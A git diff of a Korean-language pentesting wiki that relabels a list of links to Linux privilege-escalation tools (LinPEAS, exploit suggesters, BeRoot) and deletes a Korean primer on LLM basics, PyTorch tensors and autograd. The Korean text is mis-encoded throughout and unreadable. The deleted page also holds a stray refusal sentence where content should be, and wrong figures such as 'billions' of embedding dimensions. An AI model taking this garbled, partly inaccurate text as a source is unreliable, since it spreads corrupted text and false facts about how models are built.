์ธ ์ดˆ๊ธฐํ™” ๋ฐ ์„œ๋น„์Šค ๊ด€๋ฆฌ์ž์ด๋ฉฐ, ์˜จ๋””๋งจ๋“œ ๋ฐ๋ชฌ ์‹œ์ž‘, ์ž๋™ ๋งˆ์šดํŠธ ๊ด€๋ฆฌ, ์‹œ์Šคํ…œ ์ƒํƒœ ์Šค๋ƒ…์ƒท๊ณผ ๊ฐ™์€ ๊ณ ๊ธ‰ ๊ธฐ๋Šฅ์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ๋ฐฐํฌ ํŒจํ‚ค์ง€๋ฅผ ์œ„ํ•œ `/usr/lib/systemd/`์™€ ๊ด€๋ฆฌ์ž๊ฐ€ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ๋Š” `/etc/systemd/system/`์— ํŒŒ์ผ์„ ์ •๋ฆฌํ•˜์—ฌ ์‹œ์Šคํ…œ ๊ด€๋ฆฌ ํ”„๋กœ์„ธ์Šค๋ฅผ ๊ฐ„์†Œํ™”ํ•ฉ๋‹ˆ๋‹ค. +**systemd**๋Š” ํ˜„๋Œ€์ ์ธ ์ดˆ๊ธฐํ™” ๋ฐ ์„œ๋น„์Šค ๊ด€๋ฆฌ์ž์ด๋ฉฐ, ์˜จ๋””๋งจ๋“œ ๋ฐ๋ชฌ ์‹œ์ž‘, ์ž๋™ ๋งˆ์šดํŠธ ๊ด€๋ฆฌ, ์‹œ์Šคํ…œ ์ƒํƒœ ์Šค๋ƒ…์ƒท๊ณผ ๊ฐ™์€ ๊ณ ๊ธ‰ ๊ธฐ๋Šฅ์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ๋ฐฐํฌ ํŒจํ‚ค์ง€๋ฅผ ์œ„ํ•œ `/usr/lib/systemd/`์™€ ๊ด€๋ฆฌ์ž์˜ ์ˆ˜์ •์„ ์œ„ํ•œ `/etc/systemd/system/`์— ํŒŒ์ผ์„ ์ •๋ฆฌํ•˜์—ฌ ์‹œ์Šคํ…œ ๊ด€๋ฆฌ ํ”„๋กœ์„ธ์Šค๋ฅผ ๊ฐ„์†Œํ™”ํ•ฉ๋‹ˆ๋‹ค. ## ๊ธฐํƒ€ ํŠธ๋ฆญ @@ -1389,9 +1389,9 @@ cisco-vmanage.md ## ์ถ”๊ฐ€ ๋„์›€ -[Static impacket binaries](https://github.com/ropnop/impacket_static_binaries) +[์ •์  impacket ๋ฐ”์ด๋„ˆ๋ฆฌ](https://github.com/ropnop/impacket_static_binaries) -## Linux/Unix Privesc ๋„๊ตฌ +## ๋ฆฌ๋ˆ…์Šค/์œ ๋‹‰์Šค ๊ถŒํ•œ ์ƒ์Šน ๋„๊ตฌ ### **๋ฆฌ๋ˆ…์Šค ๋กœ์ปฌ ๊ถŒํ•œ ์ƒ์Šน ๋ฒกํ„ฐ๋ฅผ ์ฐพ๊ธฐ ์œ„ํ•œ ์ตœ๊ณ ์˜ ๋„๊ตฌ:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) @@ -1400,13 +1400,13 @@ cisco-vmanage.md **Unix Privesc Check:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)\ **Linux Priv Checker:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)\ **BeeRoot:** [https://github.com/AlessandroZ/BeRoot/tree/master/Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux)\ -**Kernelpop:** ๋ฆฌ๋ˆ…์Šค ๋ฐ MAC์—์„œ ์ปค๋„ ์ทจ์•ฝ์  ์—ด๊ฑฐ [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\ +**Kernelpop:** ๋ฆฌ๋ˆ…์Šค์™€ MAC์˜ ์ปค๋„ ์ทจ์•ฝ์  ์—ด๊ฑฐ [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\ **Mestaploit:** _**multi/recon/local_exploit_suggester**_\ **Linux Exploit Suggester:** [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)\ **EvilAbigail (๋ฌผ๋ฆฌ์  ์ ‘๊ทผ):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\ **๋” ๋งŽ์€ ์Šคํฌ๋ฆฝํŠธ ๋ชจ์Œ**: [https://github.com/1N3/PrivEsc](https://github.com/1N3/PrivEsc) -## ์ฐธ๊ณ ์ž๋ฃŒ +## ์ฐธ๊ณ  ๋ฌธํ—Œ - [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) - [https://payatu.com/guide-linux-privilege-escalation/](https://payatu.com/guide-linux-privilege-escalation/) diff --git a/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md b/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md deleted file mode 100644 index d98b06549..000000000 --- a/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md +++ /dev/null @@ -1,285 +0,0 @@ -# 0. Basic LLM Concepts - -## Pretraining - -Pretraining์€ ๋Œ€๊ทœ๋ชจ ์–ธ์–ด ๋ชจ๋ธ(LLM)์„ ๊ฐœ๋ฐœํ•˜๋Š” ๋ฐ ์žˆ์–ด ๊ธฐ์ดˆ์ ์ธ ๋‹จ๊ณ„๋กœ, ๋ชจ๋ธ์ด ๋ฐฉ๋Œ€ํ•œ ์–‘์˜ ๋‹ค์–‘ํ•œ ํ…์ŠคํŠธ ๋ฐ์ดํ„ฐ์— ๋…ธ์ถœ๋˜๋Š” ๊ณผ์ •์ž…๋‹ˆ๋‹ค. ์ด ๋‹จ๊ณ„์—์„œ **LLM์€ ์–ธ์–ด์˜ ๊ธฐ๋ณธ ๊ตฌ์กฐ, ํŒจํ„ด ๋ฐ ๋‰˜์•™์Šค๋ฅผ ํ•™์Šตํ•ฉ๋‹ˆ๋‹ค**, ์—ฌ๊ธฐ์—๋Š” ๋ฌธ๋ฒ•, ์–ดํœ˜, ๊ตฌ๋ฌธ ๋ฐ ๋งฅ๋ฝ์  ๊ด€๊ณ„๊ฐ€ ํฌํ•จ๋ฉ๋‹ˆ๋‹ค. ์ด ๋ฐฉ๋Œ€ํ•œ ๋ฐ์ดํ„ฐ๋ฅผ ์ฒ˜๋ฆฌํ•จ์œผ๋กœ์จ ๋ชจ๋ธ์€ ์–ธ์–ด์™€ ์ผ๋ฐ˜ ์„ธ๊ณ„ ์ง€์‹์— ๋Œ€ํ•œ ํญ๋„“์€ ์ดํ•ด๋ฅผ ์–ป๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์ด ํฌ๊ด„์ ์ธ ๊ธฐ๋ฐ˜์€ LLM์ด ์ผ๊ด€๋˜๊ณ  ๋งฅ๋ฝ์— ์ ํ•ฉํ•œ ํ…์ŠคํŠธ๋ฅผ ์ƒ์„ฑํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ์ดํ›„, ์ด ์‚ฌ์ „ ํ›ˆ๋ จ๋œ ๋ชจ๋ธ์€ ํŠน์ • ์ž‘์—…์ด๋‚˜ ๋„๋ฉ”์ธ์— ๋งž๊ฒŒ ๊ธฐ๋Šฅ์„ ์กฐ์ •ํ•˜๊ธฐ ์œ„ํ•ด ์ „๋ฌธ ๋ฐ์ดํ„ฐ์…‹์—์„œ ์ถ”๊ฐ€ ํ›ˆ๋ จ์„ ๋ฐ›๋Š” ๋ฏธ์„ธ ์กฐ์ • ๊ณผ์ •์„ ๊ฑฐ์น  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” ๋ชฉํ‘œ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์—์„œ์˜ ์„ฑ๋Šฅ๊ณผ ๊ด€๋ จ์„ฑ์„ ํ–ฅ์ƒ์‹œํ‚ต๋‹ˆ๋‹ค. - -## Main LLM components - -๋ณดํ†ต LLM์€ ํ›ˆ๋ จ์— ์‚ฌ์šฉ๋œ ๊ตฌ์„ฑ์œผ๋กœ ํŠน์ง•์ง€์–ด์ง‘๋‹ˆ๋‹ค. LLM ํ›ˆ๋ จ ์‹œ ์ผ๋ฐ˜์ ์ธ ๊ตฌ์„ฑ ์š”์†Œ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค: - -- **Parameters**: Parameters๋Š” ์‹ ๊ฒฝ๋ง์˜ **ํ•™์Šต ๊ฐ€๋Šฅํ•œ ๊ฐ€์ค‘์น˜์™€ ํŽธํ–ฅ**์ž…๋‹ˆ๋‹ค. ์ด๋Š” ํ›ˆ๋ จ ๊ณผ์ •์—์„œ ์†์‹ค ํ•จ์ˆ˜๋ฅผ ์ตœ์†Œํ™”ํ•˜๊ณ  ๋ชจ๋ธ์˜ ์ž‘์—… ์„ฑ๋Šฅ์„ ํ–ฅ์ƒ์‹œํ‚ค๊ธฐ ์œ„ํ•ด ์กฐ์ •๋˜๋Š” ์ˆซ์ž์ž…๋‹ˆ๋‹ค. LLM์€ ๋ณดํ†ต ์ˆ˜๋ฐฑ๋งŒ ๊ฐœ์˜ ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **Context Length**: ์ด๋Š” LLM์„ ์‚ฌ์ „ ํ›ˆ๋ จํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋˜๋Š” ๊ฐ ๋ฌธ์žฅ์˜ ์ตœ๋Œ€ ๊ธธ์ด์ž…๋‹ˆ๋‹ค. -- **Embedding Dimension**: ๊ฐ ํ† ํฐ ๋˜๋Š” ๋‹จ์–ด๋ฅผ ๋‚˜ํƒ€๋‚ด๋Š” ๋ฐ ์‚ฌ์šฉ๋˜๋Š” ๋ฒกํ„ฐ์˜ ํฌ๊ธฐ์ž…๋‹ˆ๋‹ค. LLM์€ ๋ณดํ†ต ์ˆ˜์‹ญ์–ต ๊ฐœ์˜ ์ฐจ์›์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **Hidden Dimension**: ์‹ ๊ฒฝ๋ง์˜ ์ˆจ๊ฒจ์ง„ ์ธต์˜ ํฌ๊ธฐ์ž…๋‹ˆ๋‹ค. -- **Number of Layers (Depth)**: ๋ชจ๋ธ์˜ ์ธต ์ˆ˜์ž…๋‹ˆ๋‹ค. LLM์€ ๋ณดํ†ต ์ˆ˜์‹ญ ๊ฐœ์˜ ์ธต์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **Number of Attention Heads**: ๋ณ€ํ™˜๊ธฐ ๋ชจ๋ธ์—์„œ ๊ฐ ์ธต์— ์‚ฌ์šฉ๋˜๋Š” ๊ฐœ๋ณ„ ์ฃผ์˜ ๋ฉ”์ปค๋‹ˆ์ฆ˜์˜ ์ˆ˜์ž…๋‹ˆ๋‹ค. LLM์€ ๋ณดํ†ต ์ˆ˜์‹ญ ๊ฐœ์˜ ํ—ค๋“œ๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **Dropout**: Dropout์€ ํ›ˆ๋ จ ์ค‘ ์ œ๊ฑฐ๋˜๋Š” ๋ฐ์ดํ„ฐ์˜ ๋น„์œจ(ํ™•๋ฅ ์ด 0์œผ๋กœ ๋ณ€ํ•จ)๊ณผ ๊ฐ™์€ ๊ฒƒ์œผ๋กœ, **๊ณผ์ ํ•ฉ์„ ๋ฐฉ์ง€ํ•˜๊ธฐ ์œ„ํ•ด** ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. LLM์€ ๋ณดํ†ต 0-20% ์‚ฌ์ด๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. - -Configuration of the GPT-2 model: -```json -GPT_CONFIG_124M = { -"vocab_size": 50257, // Vocabulary size of the BPE tokenizer -"context_length": 1024, // Context length -"emb_dim": 768, // Embedding dimension -"n_heads": 12, // Number of attention heads -"n_layers": 12, // Number of layers -"drop_rate": 0.1, // Dropout rate: 10% -"qkv_bias": False // Query-Key-Value bias -} -``` -## Tensors in PyTorch - -In PyTorch, a **tensor**๋Š” ๋‹ค์ฐจ์› ๋ฐฐ์—ด๋กœ์„œ ๊ธฐ๋ณธ ๋ฐ์ดํ„ฐ ๊ตฌ์กฐ๋กœ, ์Šค์นผ๋ผ, ๋ฒกํ„ฐ ๋ฐ ํ–‰๋ ฌ๊ณผ ๊ฐ™์€ ๊ฐœ๋…์„ ์ž ์žฌ์ ์œผ๋กœ ๋” ๋†’์€ ์ฐจ์›์œผ๋กœ ์ผ๋ฐ˜ํ™”ํ•ฉ๋‹ˆ๋‹ค. ํ…์„œ๋Š” PyTorch์—์„œ ๋ฐ์ดํ„ฐ๊ฐ€ ํ‘œํ˜„๋˜๊ณ  ์กฐ์ž‘๋˜๋Š” ์ฃผ์š” ๋ฐฉ๋ฒ•์œผ๋กœ, ํŠนํžˆ ๋”ฅ ๋Ÿฌ๋‹ ๋ฐ ์‹ ๊ฒฝ๋ง์˜ ๋งฅ๋ฝ์—์„œ ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. - -### Mathematical Concept of Tensors - -- **Scalars**: ์ˆœ์œ„ 0์˜ ํ…์„œ๋กœ, ๋‹จ์ผ ์ˆซ์ž๋ฅผ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค (0์ฐจ์›). ์˜ˆ: 5 -- **Vectors**: ์ˆœ์œ„ 1์˜ ํ…์„œ๋กœ, ์ˆซ์ž์˜ 1์ฐจ์› ๋ฐฐ์—ด์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. ์˜ˆ: \[5,1] -- **Matrices**: ์ˆœ์œ„ 2์˜ ํ…์„œ๋กœ, ํ–‰๊ณผ ์—ด์ด ์žˆ๋Š” 2์ฐจ์› ๋ฐฐ์—ด์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. ์˜ˆ: \[\[1,3], \[5,2]] -- **Higher-Rank Tensors**: ์ˆœ์œ„ 3 ์ด์ƒ์˜ ํ…์„œ๋กœ, ๋” ๋†’์€ ์ฐจ์›์—์„œ ๋ฐ์ดํ„ฐ๋ฅผ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค (์˜ˆ: ์ƒ‰์ƒ ์ด๋ฏธ์ง€๋ฅผ ์œ„ํ•œ 3D ํ…์„œ). - -### Tensors as Data Containers - -๊ณ„์‚ฐ์  ๊ด€์ ์—์„œ ํ…์„œ๋Š” ๋‹ค์ฐจ์› ๋ฐ์ดํ„ฐ๋ฅผ ์œ„ํ•œ ์ปจํ…Œ์ด๋„ˆ ์—ญํ• ์„ ํ•˜๋ฉฐ, ๊ฐ ์ฐจ์›์€ ๋ฐ์ดํ„ฐ์˜ ๋‹ค์–‘ํ•œ ํŠน์ง•์ด๋‚˜ ์ธก๋ฉด์„ ๋‚˜ํƒ€๋‚ผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ํ…์„œ๊ฐ€ ๋จธ์‹  ๋Ÿฌ๋‹ ์ž‘์—…์—์„œ ๋ณต์žกํ•œ ๋ฐ์ดํ„ฐ ์„ธํŠธ๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ฐ ๋งค์šฐ ์ ํ•ฉํ•˜๊ฒŒ ๋งŒ๋“ญ๋‹ˆ๋‹ค. - -### PyTorch Tensors vs. NumPy Arrays - -PyTorch ํ…์„œ๋Š” ์ˆซ์ž ๋ฐ์ดํ„ฐ๋ฅผ ์ €์žฅํ•˜๊ณ  ์กฐ์ž‘ํ•˜๋Š” ๋Šฅ๋ ฅ์—์„œ NumPy ๋ฐฐ์—ด๊ณผ ์œ ์‚ฌํ•˜์ง€๋งŒ, ๋”ฅ ๋Ÿฌ๋‹์— ์ค‘์š”ํ•œ ์ถ”๊ฐ€ ๊ธฐ๋Šฅ์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค: - -- **Automatic Differentiation**: PyTorch ํ…์„œ๋Š” ๊ธฐ์šธ๊ธฐ(autograd)์˜ ์ž๋™ ๊ณ„์‚ฐ์„ ์ง€์›ํ•˜์—ฌ ์‹ ๊ฒฝ๋ง ํ›ˆ๋ จ์— ํ•„์š”ํ•œ ๋ฏธ๋ถ„์„ ๊ณ„์‚ฐํ•˜๋Š” ๊ณผ์ •์„ ๋‹จ์ˆœํ™”ํ•ฉ๋‹ˆ๋‹ค. -- **GPU Acceleration**: PyTorch์˜ ํ…์„œ๋Š” GPU๋กœ ์ด๋™ํ•˜์—ฌ ๊ณ„์‚ฐํ•  ์ˆ˜ ์žˆ์–ด ๋Œ€๊ทœ๋ชจ ๊ณ„์‚ฐ์„ ํฌ๊ฒŒ ๊ฐ€์†ํ™”ํ•ฉ๋‹ˆ๋‹ค. - -### Creating Tensors in PyTorch - -You can create tensors using the `torch.tensor` function: -```python -pythonCopy codeimport torch - -# Scalar (0D tensor) -tensor0d = torch.tensor(1) - -# Vector (1D tensor) -tensor1d = torch.tensor([1, 2, 3]) - -# Matrix (2D tensor) -tensor2d = torch.tensor([[1, 2], -[3, 4]]) - -# 3D Tensor -tensor3d = torch.tensor([[[1, 2], [3, 4]], -[[5, 6], [7, 8]]]) -``` -### ํ…์„œ ๋ฐ์ดํ„ฐ ์œ ํ˜• - -PyTorch ํ…์„œ๋Š” ์ •์ˆ˜ ๋ฐ ๋ถ€๋™ ์†Œ์ˆ˜์  ์ˆซ์ž์™€ ๊ฐ™์€ ๋‹ค์–‘ํ•œ ์œ ํ˜•์˜ ๋ฐ์ดํ„ฐ๋ฅผ ์ €์žฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. - -ํ…์„œ์˜ ๋ฐ์ดํ„ฐ ์œ ํ˜•์€ `.dtype` ์†์„ฑ์„ ์‚ฌ์šฉํ•˜์—ฌ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: -```python -tensor1d = torch.tensor([1, 2, 3]) -print(tensor1d.dtype) # Output: torch.int64 -``` -- Python ์ •์ˆ˜๋กœ ์ƒ์„ฑ๋œ ํ…์„œ๋Š” `torch.int64` ์œ ํ˜•์ž…๋‹ˆ๋‹ค. -- Python ๋ถ€๋™ ์†Œ์ˆ˜์ ์œผ๋กœ ์ƒ์„ฑ๋œ ํ…์„œ๋Š” `torch.float32` ์œ ํ˜•์ž…๋‹ˆ๋‹ค. - -ํ…์„œ์˜ ๋ฐ์ดํ„ฐ ์œ ํ˜•์„ ๋ณ€๊ฒฝํ•˜๋ ค๋ฉด `.to()` ๋ฉ”์„œ๋“œ๋ฅผ ์‚ฌ์šฉํ•˜์„ธ์š”: -```python -float_tensor = tensor1d.to(torch.float32) -print(float_tensor.dtype) # Output: torch.float32 -``` -### Common Tensor Operations - -PyTorch๋Š” ํ…์„œ๋ฅผ ์กฐ์ž‘ํ•˜๊ธฐ ์œ„ํ•œ ๋‹ค์–‘ํ•œ ์ž‘์—…์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค: - -- **Accessing Shape**: `.shape`๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ…์„œ์˜ ์ฐจ์›์„ ๊ฐ€์ ธ์˜ต๋‹ˆ๋‹ค. - -```python -print(tensor2d.shape) # Output: torch.Size([2, 2]) -``` - -- **Reshaping Tensors**: `.reshape()` ๋˜๋Š” `.view()`๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ชจ์–‘์„ ๋ณ€๊ฒฝํ•ฉ๋‹ˆ๋‹ค. - -```python -reshaped = tensor2d.reshape(4, 1) -``` - -- **Transposing Tensors**: `.T`๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ 2D ํ…์„œ๋ฅผ ์ „์น˜ํ•ฉ๋‹ˆ๋‹ค. - -```python -transposed = tensor2d.T -``` - -- **Matrix Multiplication**: `.matmul()` ๋˜๋Š” `@` ์—ฐ์‚ฐ์ž๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. - -```python -result = tensor2d @ tensor2d.T -``` - -### Importance in Deep Learning - -ํ…์„œ๋Š” PyTorch์—์„œ ์‹ ๊ฒฝ๋ง์„ ๊ตฌ์ถ•ํ•˜๊ณ  ํ›ˆ๋ จํ•˜๋Š” ๋ฐ ํ•„์ˆ˜์ ์ž…๋‹ˆ๋‹ค: - -- ์ž…๋ ฅ ๋ฐ์ดํ„ฐ, ๊ฐ€์ค‘์น˜ ๋ฐ ํŽธํ–ฅ์„ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. -- ํ›ˆ๋ จ ์•Œ๊ณ ๋ฆฌ์ฆ˜์—์„œ ์ˆœ์ „ํŒŒ ๋ฐ ์—ญ์ „ํŒŒ์— ํ•„์š”ํ•œ ์ž‘์—…์„ ์šฉ์ดํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. -- autograd๋ฅผ ํ†ตํ•ด ํ…์„œ๋Š” ๊ธฐ์šธ๊ธฐ์˜ ์ž๋™ ๊ณ„์‚ฐ์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•˜์—ฌ ์ตœ์ ํ™” ํ”„๋กœ์„ธ์Šค๋ฅผ ๊ฐ„์†Œํ™”ํ•ฉ๋‹ˆ๋‹ค. - -## Automatic Differentiation - -Automatic differentiation (AD)์€ ํ•จ์ˆ˜์˜ **๋„ํ•จ์ˆ˜(๊ธฐ์šธ๊ธฐ)**๋ฅผ ํšจ์œจ์ ์ด๊ณ  ์ •ํ™•ํ•˜๊ฒŒ ํ‰๊ฐ€ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋˜๋Š” ๊ณ„์‚ฐ ๊ธฐ์ˆ ์ž…๋‹ˆ๋‹ค. ์‹ ๊ฒฝ๋ง์˜ ๋งฅ๋ฝ์—์„œ AD๋Š” **๊ฒฝ๋Ÿ‰ ํ•˜๊ฐ•๋ฒ•**๊ณผ ๊ฐ™์€ ์ตœ์ ํ™” ์•Œ๊ณ ๋ฆฌ์ฆ˜์— ํ•„์š”ํ•œ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ณ„์‚ฐํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. PyTorch๋Š” ์ด ๊ณผ์ •์„ ๊ฐ„์†Œํ™”ํ•˜๋Š” **autograd**๋ผ๋Š” ์ž๋™ ๋ฏธ๋ถ„ ์—”์ง„์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. - -### Mathematical Explanation of Automatic Differentiation - -**1. The Chain Rule** - -์ž๋™ ๋ฏธ๋ถ„์˜ ํ•ต์‹ฌ์€ ๋ฏธ์ ๋ถ„ํ•™์˜ **์—ฐ์‡„ ๋ฒ•์น™**์ž…๋‹ˆ๋‹ค. ์—ฐ์‡„ ๋ฒ•์น™์— ๋”ฐ๋ฅด๋ฉด, ํ•จ์ˆ˜์˜ ์กฐํ•ฉ์ด ์žˆ์„ ๋•Œ, ํ•ฉ์„ฑ ํ•จ์ˆ˜์˜ ๋„ํ•จ์ˆ˜๋Š” ๊ตฌ์„ฑ๋œ ํ•จ์ˆ˜์˜ ๋„ํ•จ์ˆ˜์˜ ๊ณฑ์ž…๋‹ˆ๋‹ค. - -์ˆ˜ํ•™์ ์œผ๋กœ, `y=f(u)`์ด๊ณ  `u=g(x)`์ผ ๋•Œ, `y`๋ฅผ `x`์— ๋Œ€ํ•ด ๋ฏธ๋ถ„ํ•œ ๊ฐ’์€: - -
- -**2. Computational Graph** - -AD์—์„œ ๊ณ„์‚ฐ์€ **๊ณ„์‚ฐ ๊ทธ๋ž˜ํ”„**์˜ ๋…ธ๋“œ๋กœ ํ‘œํ˜„๋˜๋ฉฐ, ๊ฐ ๋…ธ๋“œ๋Š” ์ž‘์—… ๋˜๋Š” ๋ณ€์ˆ˜๋ฅผ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. ์ด ๊ทธ๋ž˜ํ”„๋ฅผ ํƒ์ƒ‰ํ•จ์œผ๋กœ์จ ์šฐ๋ฆฌ๋Š” ๊ธฐ์šธ๊ธฐ๋ฅผ ํšจ์œจ์ ์œผ๋กœ ๊ณ„์‚ฐํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. - -3. Example - -๊ฐ„๋‹จํ•œ ํ•จ์ˆ˜๋ฅผ ๊ณ ๋ คํ•ด ๋ด…์‹œ๋‹ค: - -
- -์—ฌ๊ธฐ์„œ: - -- `ฯƒ(z)`๋Š” ์‹œ๊ทธ๋ชจ์ด๋“œ ํ•จ์ˆ˜์ž…๋‹ˆ๋‹ค. -- `y=1.0`์€ ๋ชฉํ‘œ ๋ ˆ์ด๋ธ”์ž…๋‹ˆ๋‹ค. -- `L`์€ ์†์‹ค์ž…๋‹ˆ๋‹ค. - -์šฐ๋ฆฌ๋Š” ์†์‹ค `L`์˜ ๊ฐ€์ค‘์น˜ `w`์™€ ํŽธํ–ฅ `b`์— ๋Œ€ํ•œ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ณ„์‚ฐํ•˜๊ณ ์ž ํ•ฉ๋‹ˆ๋‹ค. - -**4. Computing Gradients Manually** - -
- -**5. Numerical Calculation** - -
- -### Implementing Automatic Differentiation in PyTorch - -์ด์ œ PyTorch๊ฐ€ ์ด ๊ณผ์ •์„ ์–ด๋–ป๊ฒŒ ์ž๋™ํ™”ํ•˜๋Š”์ง€ ์‚ดํŽด๋ณด๊ฒ ์Šต๋‹ˆ๋‹ค. -```python -pythonCopy codeimport torch -import torch.nn.functional as F - -# Define input and target -x = torch.tensor([1.1]) -y = torch.tensor([1.0]) - -# Initialize weights with requires_grad=True to track computations -w = torch.tensor([2.2], requires_grad=True) -b = torch.tensor([0.0], requires_grad=True) - -# Forward pass -z = x * w + b -a = torch.sigmoid(z) -loss = F.binary_cross_entropy(a, y) - -# Backward pass -loss.backward() - -# Gradients -print("Gradient w.r.t w:", w.grad) -print("Gradient w.r.t b:", b.grad) -``` -I'm sorry, but I cannot provide the content you requested. -```css -cssCopy codeGradient w.r.t w: tensor([-0.0898]) -Gradient w.r.t b: tensor([-0.0817]) -``` -## Bigger Neural Networks์—์„œ์˜ Backpropagation - -### **1. ๋‹ค์ธต ๋„คํŠธ์›Œํฌ๋กœ ํ™•์žฅํ•˜๊ธฐ** - -์—ฌ๋Ÿฌ ์ธต์„ ๊ฐ€์ง„ ๋” ํฐ ์‹ ๊ฒฝ๋ง์—์„œ๋Š” ๋งค๊ฐœ๋ณ€์ˆ˜์™€ ์—ฐ์‚ฐ์˜ ์ˆ˜๊ฐ€ ์ฆ๊ฐ€ํ•จ์— ๋”ฐ๋ผ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ณ„์‚ฐํ•˜๋Š” ๊ณผ์ •์ด ๋” ๋ณต์žกํ•ด์ง‘๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ ๊ธฐ๋ณธ ์›๋ฆฌ๋Š” ๋™์ผํ•ฉ๋‹ˆ๋‹ค: - -- **Forward Pass:** ๊ฐ ์ธต์„ ํ†ตํ•ด ์ž…๋ ฅ์„ ์ „๋‹ฌํ•˜์—ฌ ๋„คํŠธ์›Œํฌ์˜ ์ถœ๋ ฅ์„ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. -- **Compute Loss:** ๋„คํŠธ์›Œํฌ์˜ ์ถœ๋ ฅ๊ณผ ๋ชฉํ‘œ ๋ ˆ์ด๋ธ”์„ ์‚ฌ์šฉํ•˜์—ฌ ์†์‹ค ํ•จ์ˆ˜๋ฅผ ํ‰๊ฐ€ํ•ฉ๋‹ˆ๋‹ค. -- **Backward Pass (Backpropagation):** ์ถœ๋ ฅ์ธต์—์„œ ์ž…๋ ฅ์ธต์œผ๋กœ ์ฒด์ธ ๋ฃฐ์„ ์žฌ๊ท€์ ์œผ๋กœ ์ ์šฉํ•˜์—ฌ ๋„คํŠธ์›Œํฌ์˜ ๊ฐ ๋งค๊ฐœ๋ณ€์ˆ˜์— ๋Œ€ํ•œ ์†์‹ค์˜ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. - -### **2. Backpropagation ์•Œ๊ณ ๋ฆฌ์ฆ˜** - -- **Step 1:** ๋„คํŠธ์›Œํฌ ๋งค๊ฐœ๋ณ€์ˆ˜(๊ฐ€์ค‘์น˜ ๋ฐ ํŽธํ–ฅ)๋ฅผ ์ดˆ๊ธฐํ™”ํ•ฉ๋‹ˆ๋‹ค. -- **Step 2:** ๊ฐ ํ›ˆ๋ จ ์˜ˆ์ œ์— ๋Œ€ํ•ด ์ถœ๋ ฅ์„ ๊ณ„์‚ฐํ•˜๊ธฐ ์œ„ํ•ด forward pass๋ฅผ ์ˆ˜ํ–‰ํ•ฉ๋‹ˆ๋‹ค. -- **Step 3:** ์†์‹ค์„ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. -- **Step 4:** ์ฒด์ธ ๋ฃฐ์„ ์‚ฌ์šฉํ•˜์—ฌ ๊ฐ ๋งค๊ฐœ๋ณ€์ˆ˜์— ๋Œ€ํ•œ ์†์‹ค์˜ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. -- **Step 5:** ์ตœ์ ํ™” ์•Œ๊ณ ๋ฆฌ์ฆ˜(์˜ˆ: ๊ฒฝ๋Ÿ‰ 